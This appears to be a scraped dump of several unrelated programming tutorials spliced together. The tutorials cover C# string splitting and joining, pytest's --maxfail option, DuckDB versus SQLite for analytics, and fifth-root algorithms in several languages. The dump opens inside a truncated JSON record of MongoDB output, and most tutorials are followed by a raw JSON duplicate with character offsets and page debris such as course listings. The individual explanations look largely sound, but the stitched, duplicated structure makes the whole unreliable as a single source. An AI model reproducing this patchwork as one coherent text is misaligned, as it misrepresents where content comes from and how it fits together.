"e": 2352, "s": 2311, "text": "This will produce the following output −" }, { "code": null, "e": 2562, "s": 2352, "text": "{ \"_id\" : ObjectId(\"5e8ca845ef4dcbee04fbbc11\"), \"software\" : { \"services\" : [ \"gmail\", \"facebook\" ] } }\n{ \"_id\" : ObjectId(\"5e8ca85cef4dcbee04fbbc12\"), \"software\" : { \"services\" : [ \"whatsapp\", \"twitter\" ] } }" } ]
C# program to split and join a string
To split and join a string in C#, use the Split() and Join() methods. Let us say the following is our string −

string str = "This is our Demo String";

To split the string, we will use the Split() method −

var arr = str.Split(' ');

Now to join, use the Join() method and join the rest of the string. Here, we have skipped the first part of the string using the Skip() method −

string rest = string.Join(" ", arr.Skip(1));

You can try to run the following code in C# to split and join a string.

using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;

namespace Demo {
   class MyApplication {
      static void Main(string[] args) {
         string str = "This is our Demo String";
         var arr = str.Split(' ');

         // skips the first element and joins rest of the array
         string rest = string.Join(" ", arr.Skip(1));
         Console.WriteLine(rest);
      }
   }
}

is our Demo String
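Split() also has an overload that takes several separator characters plus a StringSplitOptions value to drop empty entries. A hedged variation (the csv string and separators below are illustrative, not from the example above) −

using System;
using System.Linq;

namespace Demo {
   class SplitVariants {
      static void Main(string[] args) {
         string csv = "one,,two;three";

         // split on ',' and ';', discarding the empty entry between the commas
         var parts = csv.Split(new[] { ',', ';' },
                               StringSplitOptions.RemoveEmptyEntries);

         // rejoin with a visible separator
         Console.WriteLine(string.Join(" | ", parts)); // one | two | three
      }
   }
}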
[ { "code": null, "e": 1172, "s": 1062, "text": "To split and join a string in C#, use the split() and join() method. Let us say the following is our string −" }, { "code": null, "e": 1212, "s": 1172, "text": "string str = \"This is our Demo String\";" }, { "code": null, "e": 1266, "s": 1212, "text": "To split the string, we will use the split() method −" }, { "code": null, "e": 1292, "s": 1266, "text": "var arr = str.Split(' ');" }, { "code": null, "e": 1427, "s": 1292, "text": "Now to join, use the join() method and join rest of the string. Here, we have skipped the part of the string using the skip() method −" }, { "code": null, "e": 1472, "s": 1427, "text": "string rest = string.Join(\" \", arr.Skip(1));" }, { "code": null, "e": 1544, "s": 1472, "text": "You can try to run the following code in C# to split and join a string." }, { "code": null, "e": 1554, "s": 1544, "text": "Live Demo" }, { "code": null, "e": 1973, "s": 1554, "text": "using System;\nusing System.Collections.Generic;\nusing System.Linq;\nusing System.Text;\nnamespace Demo {\n class MyApplication {\n static void Main(string[] args) {\n string str = \"This is our Demo String\";\n var arr = str.Split(' ');\n // skips the first element and joins rest of the array\n string rest = string.Join(\" \", arr.Skip(1));\n Console.WriteLine(rest);\n }\n }\n}" }, { "code": null, "e": 1992, "s": 1973, "text": "is our Demo String" } ]
Pytest - Stop Test Suite after N Test Failures
In a real scenario, once a new version of the code is ready to deploy, it is first deployed into a pre-prod/staging environment. Then a test suite runs on it.

The code is qualified for deploying to production only if the test suite passes. If there is a test failure, whether it is one or many, the code is not production ready.

Therefore, what if we want to stop the execution of the test suite as soon as n tests fail? This can be done in pytest using maxfail.

The syntax to stop the execution of the test suite after n test failures is as follows −

pytest --maxfail=<num>

Create a file test_failure.py with the following code.

import pytest
import math

def test_sqrt_failure():
   num = 25
   assert math.sqrt(num) == 6

def test_square_failure():
   num = 7
   assert 7*7 == 40

def test_equality_failure():
   assert 10 == 11

All 3 tests will fail on executing this test file. Here, we are going to stop the execution of the tests after one failure itself by −

pytest test_failure.py -v --maxfail=1

test_failure.py::test_sqrt_failure FAILED
=================================== FAILURES ===================================
______________________________ test_sqrt_failure _______________________________
   def test_sqrt_failure():
      num = 25
>     assert math.sqrt(num) == 6
E     assert 5.0 == 6
E     + where 5.0 = <built-in function sqrt>(25)
E     + where <built-in function sqrt> = math.sqrt
test_failure.py:6: AssertionError
=========================== 1 failed in 0.04 seconds ===========================

In the above result, we can see the execution is stopped on one failure.
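For the common case of stopping after the very first failure, pytest also provides the -x flag, which is shorthand for --maxfail=1 −

pytest -x test_failure.py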
[ { "code": null, "e": 2200, "s": 2042, "text": "In a real scenario, once a new version of the code is ready to deploy, it is first deployed into pre-prod/ staging environment. Then a test suite runs on it." }, { "code": null, "e": 2368, "s": 2200, "text": "The code is qualified for deploying to production only if the test suite passes. If there is test failure, whether it is one or many, the code is not production ready." }, { "code": null, "e": 2508, "s": 2368, "text": "Therefore, what if we want to stop the execution of test suite soon after n number of test fails. This can be done in pytest using maxfail." }, { "code": null, "e": 2605, "s": 2508, "text": "The syntax to stop the execution of test suite soon after n number of test fails is as follows −" }, { "code": null, "e": 2631, "s": 2605, "text": "pytest --maxfail = <num>\n" }, { "code": null, "e": 2686, "s": 2631, "text": "Create a file test_failure.py with the following code." }, { "code": null, "e": 2888, "s": 2686, "text": "import pytest\nimport math\n\ndef test_sqrt_failure():\n num = 25\n assert math.sqrt(num) == 6\n\ndef test_square_failure():\n num = 7\n assert 7*7 == 40\n\ndef test_equality_failure():\n assert 10 == 11" }, { "code": null, "e": 3026, "s": 2888, "text": "All the 3 tests will fail on executing this test file. Here, we are going to stop the execution\nof the test after one failure itself by −" }, { "code": null, "e": 3065, "s": 3026, "text": "pytest test_failure.py -v --maxfail 1\n" }, { "code": null, "e": 3595, "s": 3065, "text": "test_failure.py::test_sqrt_failure FAILED\n=================================== FAILURES\n=================================== _______________________________________\ntest_sqrt_failure __________________________________________\n def test_sqrt_failure():\n num = 25\n> assert math.sqrt(num) == 6\nE assert 5.0 == 6\nE + where 5.0 = <built-in function sqrt>(25)\nE + where <built-in function sqrt>= math.sqrt\ntest_failure.py:6: AssertionError\n=============================== 1 failed in 0.04 seconds\n===============================\n" }, { "code": null, "e": 3668, "s": 3595, "text": "In the above result, we can see the execution is stopped on one failure." }, { "code": null, "e": 3701, "s": 3668, "text": "\n 21 Lectures \n 4 hours \n" }, { "code": null, "e": 3715, "s": 3701, "text": " Lucian Musat" }, { "code": null, "e": 3750, "s": 3715, "text": "\n 22 Lectures \n 1.5 hours \n" }, { "code": null, "e": 3766, "s": 3750, "text": " Fanuel Mapuwei" }, { "code": null, "e": 3801, "s": 3766, "text": "\n 44 Lectures \n 3.5 hours \n" }, { "code": null, "e": 3818, "s": 3801, "text": " Rohit Dharaviya" }, { "code": null, "e": 3825, "s": 3818, "text": " Print" }, { "code": null, "e": 3836, "s": 3825, "text": " Add Notes" } ]
DuckDB — SQLite for Data Analysis | by Alan Jones | Towards Data Science
When I wrote Python Pandas and SQLite, for Towards Data Science, I was unaware of another embedded database system called DuckDB. I received a tweet about it a day or so after publication so thought I should take a look at it.

DuckDB is not built in to Python like SQLite but after a simple install, you'd hardly know the difference.

Except that there is a difference. The DuckDB developers claim that their database system is up to 10 times faster than SQLite for analytics applications. There are of course technical reasons in the design of the database for this, but the main reason is that there are relational databases for two types of application: Online Transactional Processing (OLTP) and Online Analytical Processing (OLAP).

OLTP applications are typically business processes that modify database tables in response to external requests. A banking system is an example: people are taking money out, putting it in and their balances are shifting up and down all the time, meaning that the data in the database is constantly changing in response to the transactions that are occurring. A database tracking sales and stock levels might have similar types of data updates going on as items are sold to customers or received from suppliers.

Essentially, OLTP systems spend most of their time inserting, deleting and updating rows in database tables.

OLAP systems are less dynamic. They are more like data warehouses. Data is stored but doesn't change that often. The main types of operation will be selecting, reading, comparing and analysing data. An online retailer might analyse customer purchasing data, compare it to other customers and try to analyse similarities. By doing this they can attempt to predict an individual's preferences so that visitors to their web site can get a personalized experience.

OLAP systems tend to spend most of their time dealing with columns of data, summing, finding means and that sort of thing.

Although database systems all have the same basic functionality, those designed for OLTP are less good at OLAP applications and vice versa, due to the way data is stored: in a way that is easier to access by column, or in a way that is easier to access by row.

So SQLite is good for OLTP and DuckDB is better for OLAP.

You can try it out with my original article by doing a pip install:

pip install duckdb

and changing the first line of the code from

import sqlite3 as sql

to

import duckdb as sql

The rest of the code should work as before.

Don't expect to see much difference in the operation of the simple code that I presented in that article but if you need to do any heavy duty data analytics then you might find that DuckDB is a better bet.
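DuckDB exposes a DB-API style interface very close to sqlite3, which is why the one-line swap works. A minimal sketch; the table name and rows here are my own illustration, not from the original article:

import duckdb as sql

# in-memory database; connect/execute/fetch work as in sqlite3
con = sql.connect(":memory:")
con.execute("CREATE TABLE scores (name VARCHAR, score INTEGER)")
con.execute("INSERT INTO scores VALUES ('a', 1), ('b', 2), ('c', 3)")

# a typical OLAP-style query: an aggregate over a column
print(con.execute("SELECT AVG(score) FROM scores").fetchall())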
[ { "code": null, "e": 398, "s": 172, "text": "When I wrote Python Pandas and SQLite, for Towards Data Science, I was unaware of another embedded database sytem called DuckDB. I received a tweet about it a day or so after publication so thought I should take a look at it." }, { "code": null, "e": 504, "s": 398, "text": "DuckDB is not buit in to Python like SQLite but after a simple install, you’d hardly know the difference." }, { "code": null, "e": 904, "s": 504, "text": "Except that there is a difference. The DuckDB developers claim that their database system is up to 10 times faster than SQLite for analytics applications. There are of course technical reasons in the design of the database for this but the main reason is that there are relational databases for two types of application: Online Transactional Processing(OLTP) and Online Analytical Processing (OLAP)." }, { "code": null, "e": 1414, "s": 904, "text": "OLTP applications are typically business processes that modify database tables in response to external requests. A banking system is an example: people are taking money out, putting it in and their balances are shifting up and down all the time meaning that the data in the database in constantly changing in response to the transaction that are occuring. A database tracking sales and stock levels might have a similar types of data updates going on as items are sold to customers or received from suppliers." }, { "code": null, "e": 1524, "s": 1414, "text": "Essentially, OLTP systems spend most of their time, inserting, deleting and updating rows in database tables." }, { "code": null, "e": 1985, "s": 1524, "text": "OLAP sytems are less dynamic. They are more like data warehouses. Data is stored but doesn’t change that often. The main types of operation will be selecting, reading, comparing and analysing data. An online retailer might analyse customer purchasing data, compare it to other customers and try and analyse similarities. By doing this they can attempt to predict an individual’s preferences so that visitors to their web site can get a personalized experience." }, { "code": null, "e": 2108, "s": 1985, "text": "OLAP systems tend to spend most of their time dealing with columns of data, summing, finding means and that sort of thing." }, { "code": null, "e": 2353, "s": 2108, "text": "Although database systems all have the same basic functionality, those designed for OLTP are less good at OLAP applications and vice versa due to the way data is stored — in a way that easier to access columns or one that easier to access rows." }, { "code": null, "e": 2411, "s": 2353, "text": "So SQLite is good for OLTP and DuckDB is better for OLAP." }, { "code": null, "e": 2479, "s": 2411, "text": "You can try it out with my original article by doing a pip install:" }, { "code": null, "e": 2498, "s": 2479, "text": "pip install duckdb" }, { "code": null, "e": 2543, "s": 2498, "text": "and changing the first line of the code from" }, { "code": null, "e": 2565, "s": 2543, "text": "import sqlite3 as sql" }, { "code": null, "e": 2568, "s": 2565, "text": "to" }, { "code": null, "e": 2589, "s": 2568, "text": "import duckdb as sql" }, { "code": null, "e": 2633, "s": 2589, "text": "The rest of the code should work as before." }, { "code": null, "e": 2839, "s": 2633, "text": "Don’t expect to see much difference in the operation of the simple code that I presented in that article but if you need to do any heavy duty data analytics then you might find that DuckDB is a better bet." 
}, { "code": null, "e": 2949, "s": 2839, "text": "I’ll be writing more about this topic in the future but, for now, thanks for reading and happy data analysis." }, { "code": null, "e": 3012, "s": 2949, "text": "Disclosure: I have no connection with DuckDB or its developers" } ]
Fifth root of a number - GeeksforGeeks
19 Oct, 2021

Given a number, print the floor of the 5'th root of the number.

Examples:

Input : n = 32
Output : 2
2 raised to the power 5 is 32

Input : n = 250
Output : 3
The fifth root of 250 is between 3 and 4,
so the floor value is 3.

Method 1 (Simple) A simple solution is to initialize the result as 0 and keep incrementing the result while result^5 is smaller than or equal to n. Finally, return result - 1.

C++14

// A C++ program to find floor of 5th root
#include <bits/stdc++.h>
using namespace std;

// Returns floor of 5th root of n
int floorRoot5(int n)
{
    // Base cases
    if (n == 0 || n == 1)
        return n;

    // Initialize result
    int res = 0;

    // Keep incrementing res while res^5 is
    // smaller than or equal to n
    while (res * res * res * res * res <= n)
        res++;

    // Return floor of 5'th root
    return res - 1;
}

// Driver program
int main()
{
    int n = 250;
    cout << "Floor of 5'th root is " << floorRoot5(n);
    return 0;
}

Java

// Java program to find floor of 5th root
class GFG {

    // Returns floor of 5th root of n
    static int floorRoot5(int n)
    {
        // Base cases
        if (n == 0 || n == 1)
            return n;

        // Initialize result
        int res = 0;

        // Keep incrementing res while res^5
        // is smaller than or equal to n
        while (res * res * res * res * res <= n)
            res++;

        // Return floor of 5'th root
        return res - 1;
    }

    // Driver Code
    public static void main(String[] args)
    {
        int n = 250;
        System.out.println("Floor of 5'th root is " + floorRoot5(n));
    }
}

// This code is contributed by Anshul Aggarwal.

Python3

# A Python3 program to find the floor
# of the 5th root

# Returns floor of 5th root of n
def floorRoot5(n):

    # Base cases
    if n == 0 or n == 1:
        return n

    # Initialize result
    res = 0

    # Keep incrementing res while res^5
    # is smaller than or equal to n
    while res * res * res * res * res <= n:
        res += 1

    # Return floor of 5'th root
    return res - 1

# Driver Code
if __name__ == "__main__":
    n = 250
    print("Floor of 5'th root is", floorRoot5(n))

# This code is contributed by Rituraj Jain

C#

// C# program to find floor of 5th root
using System;

class GFG {

    // Returns floor of 5th root of n
    static int floorRoot5(int n)
    {
        // Base cases
        if (n == 0 || n == 1)
            return n;

        // Initialize result
        int res = 0;

        // Keep incrementing res while res^5
        // is smaller than or equal to n
        while (res * res * res * res * res <= n)
            res++;

        // Return floor of 5'th root
        return res - 1;
    }

    // Driver Code
    public static void Main()
    {
        int n = 250;
        Console.Write("Floor of 5'th root is " + floorRoot5(n));
    }
}

// This code is contributed by Sumit Sudhakar.

PHP

<?php
// PHP program to find
// floor of 5th root

// Returns floor of
// 5th root of n
function floorRoot5($n)
{
    // Base cases
    if ($n == 0 || $n == 1)
        return $n;

    // Initialize result
    $res = 0;

    // Keep incrementing res while
    // res^5 is smaller than or
    // equal to n
    while ($res * $res * $res * $res * $res <= $n)
        $res++;

    // Return floor
    // of 5'th root
    return $res - 1;
}

// Driver Code
$n = 250;
echo "Floor of 5'th root is ", floorRoot5($n);

// This code is contributed by nitin mittal.
?>

Javascript

<script>
// JavaScript program to find floor of 5th root

// Returns floor of 5th root of n
function floorRoot5(n)
{
    // Base cases
    if (n == 0 || n == 1)
        return n;

    // Initialize result
    let res = 0;

    // Keep incrementing res while res^5
    // is smaller than or equal to n
    while (res * res * res * res * res <= n)
        res++;

    // Return floor of 5'th root
    return res - 1;
}

// Driver Code
let n = 250;
document.write("Floor of 5'th root is " + floorRoot5(n));
</script>

Output:

Floor of 5'th root is 3

The time complexity of the above solution is O(n^(1/5)). We can do better. See the solution below.
Method 2 (Binary Search) The idea is to do Binary Search. We start from n/2; if its 5'th power is more than n, we recur for the interval 0 to n/2-1. Else, if the power is less, we recur for the interval n/2+1 to n.

C++

// A C++ program to find floor of 5'th root
#include <bits/stdc++.h>
using namespace std;

// Returns floor of 5'th root of n
int floorRoot5(int n)
{
    // Base cases
    if (n == 0 || n == 1)
        return n;

    // Do Binary Search for floor of 5th root
    int low = 1, high = n, ans = 0;
    while (low <= high)
    {
        // Find the middle point and its power 5
        // (computed in 64 bits to avoid intermediate overflow)
        int mid = (low + high) / 2;
        long long mid5 = (long long)mid * mid * mid * mid * mid;

        // If mid is the required root
        if (mid5 == n)
            return mid;

        // Since we need floor, we update answer when
        // mid5 is smaller than n, and move closer to
        // 5'th root
        if (mid5 < n)
        {
            low = mid + 1;
            ans = mid;
        }
        else // If mid^5 is greater than n
            high = mid - 1;
    }
    return ans;
}

// Driver program
int main()
{
    int n = 250;
    cout << "Floor of 5'th root is " << floorRoot5(n);
    return 0;
}

Java

// A Java program to find
// floor of 5'th root
class GFG {

    // Returns floor of 5'th
    // root of n
    static int floorRoot5(int n)
    {
        // Base cases
        if (n == 0 || n == 1)
            return n;

        // Do Binary Search for
        // floor of 5th root
        int low = 1, high = n, ans = 0;
        while (low <= high)
        {
            // Find the middle point and its power 5
            // (computed in 64 bits to avoid intermediate overflow)
            int mid = (low + high) / 2;
            long mid5 = (long)mid * mid * mid * mid * mid;

            // If mid is the required root
            if (mid5 == n)
                return mid;

            // Since we need floor,
            // we update answer when
            // mid5 is smaller than n,
            // and move closer to
            // 5'th root
            if (mid5 < n)
            {
                low = mid + 1;
                ans = mid;
            }
            // If mid^5 is greater
            // than n
            else
                high = mid - 1;
        }
        return ans;
    }

    // Driver Code
    public static void main(String[] args)
    {
        int n = 250;
        System.out.println("Floor of 5'th root is " + floorRoot5(n));
    }
}

// This code is contributed by Anshul Aggarwal.

Python3

# A Python3 program to find the floor
# of the 5'th root

# Returns floor of 5'th root of n
def floorRoot5(n):

    # Base cases
    if n == 0 or n == 1:
        return n

    # Do Binary Search for floor of
    # 5th root
    low, high, ans = 1, n, 0
    while low <= high:

        # Find the middle point and its power 5
        mid = (low + high) // 2
        mid5 = mid * mid * mid * mid * mid

        # If mid is the required root
        if mid5 == n:
            return mid

        # Since we need floor, we update answer
        # when mid5 is smaller than n, and move
        # closer to 5'th root
        if mid5 < n:
            low = mid + 1
            ans = mid
        else:
            # If mid^5 is greater than n
            high = mid - 1

    return ans

# Driver Code
if __name__ == "__main__":
    n = 250
    print("Floor of 5'th root is", floorRoot5(n))

# This code is contributed by Rituraj Jain

C#

// A C# program to find
// floor of 5'th root
using System;

class GFG {

    // Returns floor of 5'th
    // root of n
    static int floorRoot5(int n)
    {
        // Base cases
        if (n == 0 || n == 1)
            return n;

        // Do Binary Search for
        // floor of 5th root
        int low = 1, high = n, ans = 0;
        while (low <= high)
        {
            // Find the middle point and its power 5
            // (computed in 64 bits to avoid intermediate overflow)
            int mid = (low + high) / 2;
            long mid5 = (long)mid * mid * mid * mid * mid;

            // If mid is the required root
            if (mid5 == n)
                return mid;

            // Since we need floor,
            // we update answer when
            // mid5 is smaller than n,
            // and move closer to
            // 5'th root
            if (mid5 < n)
            {
                low = mid + 1;
                ans = mid;
            }
            // If mid^5 is greater
            // than n
            else
                high = mid - 1;
        }
        return ans;
    }

    // Driver Code
    public static void Main(String[] args)
    {
        int n = 250;
        Console.WriteLine("Floor of 5'th root is " + floorRoot5(n));
    }
}

// This code is contributed by Anshul Aggarwal.
PHP

<?php
// A PHP program to find floor of 5'th root

// Returns floor of 5'th root of n
function floorRoot5($n)
{
    // Base cases
    if ($n == 0 || $n == 1)
        return $n;

    // Do Binary Search for floor of 5th root
    $low = 1; $high = $n; $ans = 0;
    while ($low <= $high)
    {
        // Find the middle point and its power 5
        $mid = (int)(($low + $high) / 2);
        $mid5 = $mid * $mid * $mid * $mid * $mid;

        // If mid is the required root
        if ($mid5 == $n)
            return $mid;

        // Since we need floor, we update answer when
        // mid5 is smaller than n, and move closer to
        // 5'th root
        if ($mid5 < $n)
        {
            $low = $mid + 1;
            $ans = $mid;
        }
        else // If mid^5 is greater than n
            $high = $mid - 1;
    }
    return $ans;
}

// Driver code
$n = 250;
echo "Floor of 5'th root is " . floorRoot5($n);

// This code is contributed by mits
?>

Javascript

<script>
// A JavaScript program to find
// floor of 5'th root

// Returns floor of 5'th
// root of n
function floorRoot5(n)
{
    // Base cases
    if (n == 0 || n == 1)
        return n;

    // Do Binary Search for
    // floor of 5th root
    var low = 1, high = n, ans = 0;
    while (low <= high)
    {
        // Find the middle point
        // and its power 5
        var mid = parseInt((low + high) / 2);
        var mid5 = mid * mid * mid * mid * mid;

        // If mid is the required root
        if (mid5 == n)
            return mid;

        // Since we need floor,
        // we update answer when
        // mid5 is smaller than n,
        // and move closer to
        // 5'th root
        if (mid5 < n)
        {
            low = mid + 1;
            ans = mid;
        }
        // If mid^5 is greater
        // than n
        else
            high = mid - 1;
    }
    return ans;
}

// Driver Code
var n = 250;
document.write("Floor of 5'th root is " + floorRoot5(n));

// This code contributed by Princi Singh
</script>

Output:

Floor of 5'th root is 3

Time Complexity: O(log n)
Auxiliary Space: O(1)

We can also use the Newton-Raphson method to find the exact root. See this for implementation.
Source : http://qa.geeksforgeeks.org/7487/program-calculate-fifth-without-using-mathematical-operators
Please write comments if you find anything incorrect, or if you want to share more information about the topic discussed above.
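A third approach, not covered in the article above, is to use the standard pow() function and then correct the result for floating-point error. A minimal C++ sketch under that assumption (the function name is mine):

#include <cmath>

// Floor of 5'th root via pow(), with an integer correction pass
// for round-off in either direction
int floorRoot5Pow(int n)
{
    int r = (int)std::pow(n, 1.0 / 5.0);

    // pow() may land just below or just above the true root
    while ((long long)(r + 1) * (r + 1) * (r + 1) * (r + 1) * (r + 1) <= n)
        r++;
    while ((long long)r * r * r * r * r > n)
        r--;
    return r;
}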
[ { "code": null, "e": 24301, "s": 24273, "text": "\n19 Oct, 2021" }, { "code": null, "e": 24368, "s": 24301, "text": "Given a number, print floor of 5’th root of the number.Examples: " }, { "code": null, "e": 24514, "s": 24368, "text": "Input : n = 32\nOutput : 2\n2 raise to power 5 is 32\n\nInput : n = 250\nOutput : 3\nFifth square root of 250 is between 3 and 4\nSo floor value is 3." }, { "code": null, "e": 24676, "s": 24514, "text": "Method 1 (Simple) A simple solution is initialize result as 0, keep incrementing result while result5 is smaller than or equal to n. Finally return result – 1. " }, { "code": null, "e": 24682, "s": 24676, "text": "C++14" }, { "code": null, "e": 24687, "s": 24682, "text": "Java" }, { "code": null, "e": 24695, "s": 24687, "text": "Python3" }, { "code": null, "e": 24698, "s": 24695, "text": "C#" }, { "code": null, "e": 24702, "s": 24698, "text": "PHP" }, { "code": null, "e": 24713, "s": 24702, "text": "Javascript" }, { "code": "// A C++ program to find floor of 5th root#include<bits/stdc++.h>using namespace std; // Returns floor of 5th root of nint floorRoot5(int n){ // Base cases if (n == 0 || n == 1) return n; // Initialize result int res = 0; // Keep incrementing res while res^5 is // smaller than or equal to n while (res*res*res*res*res <= n) res++; // Return floor of 5'th root return res-1;} // Driver programint main(){ int n = 250; cout << \"Floor of 5'th root is \" << floorRoot5(n); return 0;}", "e": 25254, "s": 24713, "text": null }, { "code": "// Java program to find floor of 5th root class GFG { // Returns floor of 5th root of nstatic int floorRoot5(int n){ // Base cases if (n == 0 || n == 1) return n; // Initialize result int res = 0; // Keep incrementing res while res^5 // is smaller than or equal to n while (res * res * res * res * res <= n) res++; // Return floor of 5'th root return res-1;} // Driver Code public static void main(String []args) { int n = 250; System.out.println(\"Floor of 5'th root is \" + floorRoot5(n)); }} // This code is contributed by Anshul Aggarwal.", "e": 25902, "s": 25254, "text": null }, { "code": "# A Python3 program to find the floor# of the 5th root # Returns floor of 5th root of ndef floorRoot5(n): # Base cases if n == 0 and n == 1: return n # Initialize result res = 0 # Keep incrementing res while res^5 # is smaller than or equal to n while res * res * res * res * res <= n: res += 1 # Return floor of 5'th root return res-1 # Driver Codeif __name__ == \"__main__\": n = 250 print(\"Floor of 5'th root is\", floorRoot5(n)) # This code is contributed by Rituraj Jain", "e": 26446, "s": 25902, "text": null }, { "code": "// C# program to find floor of 5th rootusing System; class GFG { // Returns floor of 5th root of nstatic int floorRoot5(int n){ // Base cases if (n == 0 || n == 1) return n; // Initialize result int res = 0; // Keep incrementing res while res^5 // is smaller than or equal to n while (res * res * res * res * res <= n) res++; // Return floor of 5'th root return res-1;} // Driver Code public static void Main() { int n = 250; Console.Write(\"Floor of 5'th root is \" + floorRoot5(n)); }} // This code is contributed by Sumit Sudhakar.", "e": 27081, "s": 26446, "text": null }, { "code": "<?php// PHP program to find// floor of 5th root // Returns floor of// 5th root of nfunction floorRoot5($n){ // Base cases if ($n == 0 || $n == 1) return $n; // Initialize result $res = 0; // Keep incrementing res while // res^5 is smaller than or // equal to n while ($res * $res * $res * $res * $res <= $n) $res++; // Return floor 
// of 5'th root return $res - 1;} // Driver Code $n = 250; echo \"Floor of 5'th root is \" , floorRoot5($n); // This code is contributed by nitin mittal.?>", "e": 27657, "s": 27081, "text": null }, { "code": "<script> // JavaScript program to find floor of 5th root // Returns floor of 5th root of nfunction floorRoot5(n){ // Base cases if (n == 0 || n == 1) return n; // Initialize result let res = 0; // Keep incrementing res while res^5 // is smaller than or equal to n while (res * res * res * res * res <= n) res++; // Return floor of 5'th root return res-1;} // Driver Code let n = 250; document.write(\"Floor of 5'th root is \" + floorRoot5(n)); </script>", "e": 28207, "s": 27657, "text": null }, { "code": null, "e": 28216, "s": 28207, "text": "Output: " }, { "code": null, "e": 28240, "s": 28216, "text": "Floor of 5'th root is 3" }, { "code": null, "e": 28535, "s": 28240, "text": "Time complexity of above solution is O(n1/5). We can do better. See below solution. Method 2 (Binary Search) The idea is to do Binary Search. We start from n/2 and if its 5’th power is more than n, we recur for interval from n/2+1 to n. Else if power is less, we recur for interval 0 to n/2-1 " }, { "code": null, "e": 28539, "s": 28535, "text": "C++" }, { "code": null, "e": 28544, "s": 28539, "text": "Java" }, { "code": null, "e": 28552, "s": 28544, "text": "Python3" }, { "code": null, "e": 28555, "s": 28552, "text": "C#" }, { "code": null, "e": 28559, "s": 28555, "text": "PHP" }, { "code": null, "e": 28570, "s": 28559, "text": "Javascript" }, { "code": "// A C++ program to find floor of 5'th root#include<bits/stdc++.h>using namespace std; // Returns floor of 5'th root of nint floorRoot5(int n){ // Base cases if (n == 0 || n == 1) return n; // Do Binary Search for floor of 5th square root int low = 1, high = n, ans = 0; while (low <= high) { // Find the middle point and its power 5 int mid = (low + high) / 2; long int mid5 = mid*mid*mid*mid*mid; // If mid is the required root if (mid5 == n) return mid; // Since we need floor, we update answer when // mid5 is smaller than n, and move closer to // 5'th root if (mid5 < n) { low = mid + 1; ans = mid; } else // If mid^5 is greater than n high = mid - 1; } return ans;} // Driver programint main(){ int n = 250; cout << \"Floor of 5'th root is \" << floorRoot5(n); return 0;}", "e": 29524, "s": 28570, "text": null }, { "code": "// A Java program to find// floor of 5'th root class GFG { // Returns floor of 5'th // root of n static int floorRoot5(int n) { // Base cases if (n == 0 || n == 1) return n; // Do Binary Search for // floor of 5th square root int low = 1, high = n, ans = 0; while (low <= high) { // Find the middle point // and its power 5 int mid = (low + high) / 2; long mid5 = mid * mid * mid * mid * mid; // If mid is the required root if (mid5 == n) return mid; // Since we need floor, // we update answer when // mid5 is smaller than n, // and move closer to // 5'th root if (mid5 < n) { low = mid + 1; ans = mid; } // If mid^5 is greater // than n else high = mid - 1; } return ans; } // Driver Code public static void main(String []args) { int n = 250; System.out.println(\"Floor of 5'th root is \" + floorRoot5(n)); }} // This code is contributed by Anshul Aggarwal.", "e": 30863, "s": 29524, "text": null }, { "code": "# A Python3 program to find the floor# of 5'th root # Returns floor of 5'th root of ndef floorRoot5(n): # Base cases if n == 0 or n == 1: return n # Do Binary Search for floor of # 5th square root low, high, ans = 1, n, 0 while low <= high: # Find the 
middle point and its power 5 mid = (low + high) // 2 mid5 = mid * mid * mid * mid * mid # If mid is the required root if mid5 == n: return mid # Since we need floor, we update answer # when mid5 is smaller than n, and move # closer to 5'th root if mid5 < n: low = mid + 1 ans = mid else: # If mid^5 is greater than n high = mid - 1 return ans # Driver Codeif __name__ == \"__main__\": n = 250 print(\"Floor of 5'th root is\", floorRoot5(n)) # This code is contributed by Rituraj Jain", "e": 31776, "s": 30863, "text": null }, { "code": "// A C# program to find// floor of 5'th rootusing System; class GFG { // Returns floor of 5'th // root of n static int floorRoot5(int n) { // Base cases if (n == 0 || n == 1) return n; // Do Binary Search for // floor of 5th square root int low = 1, high = n, ans = 0; while (low <= high) { // Find the middle point // and its power 5 int mid = (low + high) / 2; long mid5 = mid * mid * mid * mid * mid; // If mid is the required root if (mid5 == n) return mid; // Since we need floor, // we update answer when // mid5 is smaller than n, // and move closer to // 5'th root if (mid5 < n) { low = mid + 1; ans = mid; } // If mid^5 is greater // than n else high = mid - 1; } return ans; } // Driver Code public static void Main(String []args) { int n = 250; Console.WriteLine(\"Floor of 5'th root is \" + floorRoot5(n)); }} // This code is contributed by Anshul Aggarwal.", "e": 33125, "s": 31776, "text": null }, { "code": "<?php// A PHP program to find floor of 5'th root // Returns floor of 5'th root of nfunction floorRoot5($n){ // Base cases if ($n == 0 || $n == 1) return $n; // Do Binary Search for floor of 5th square root $low = 1; $high = $n; $ans = 0; while ($low <= $high) { // Find the middle point and its power 5 $mid = (int)(($low + $high) / 2); $mid5 = $mid*$mid*$mid*$mid*$mid; // If mid is the required root if ($mid5 == $n) return $mid; // Since we need floor, we update answer when // mid5 is smaller than n, and move closer to // 5'th root if ($mid5 < $n) { $low = $mid + 1; $ans = $mid; } else // If mid^5 is greater than n $high = $mid - 1; } return $ans;} // Driver code $n = 250; echo \"Floor of 5'th root is \".floorRoot5($n); // This code is contributed by mits?>", "e": 34068, "s": 33125, "text": null }, { "code": "<script> // A javascript program to find// floor of 5'th root // Returns floor of 5'th// root of nfunction floorRoot5(n){ // Base cases if (n == 0 || n == 1) return n; // Do Binary Search for // floor of 5th square root var low = 1, high = n, ans = 0; while (low <= high) { // Find the middle point // and its power 5 var mid = parseInt((low + high) / 2); var mid5 = mid * mid * mid * mid * mid; // If mid is the required root if (mid5 == n) return mid; // Since we need floor, // we update answer when // mid5 is smaller than n, // and move closer to // 5'th root if (mid5 < n) { low = mid + 1; ans = mid; } // If mid^5 is greater // than n else high = mid - 1; } return ans;} // Driver Codevar n = 250;document.write(\"Floor of 5'th root is \" + floorRoot5(n)); // This code contributed by Princi Singh </script>", "e": 35152, "s": 34068, "text": null }, { "code": null, "e": 35161, "s": 35152, "text": "Output: " }, { "code": null, "e": 35185, "s": 35161, "text": "Floor of 5'th root is 3" }, { "code": null, "e": 35544, "s": 35185, "text": "Time Complexity: O(logN)Auxiliary Space: O(1) We can also use Newton Raphson Method to find exact root. 
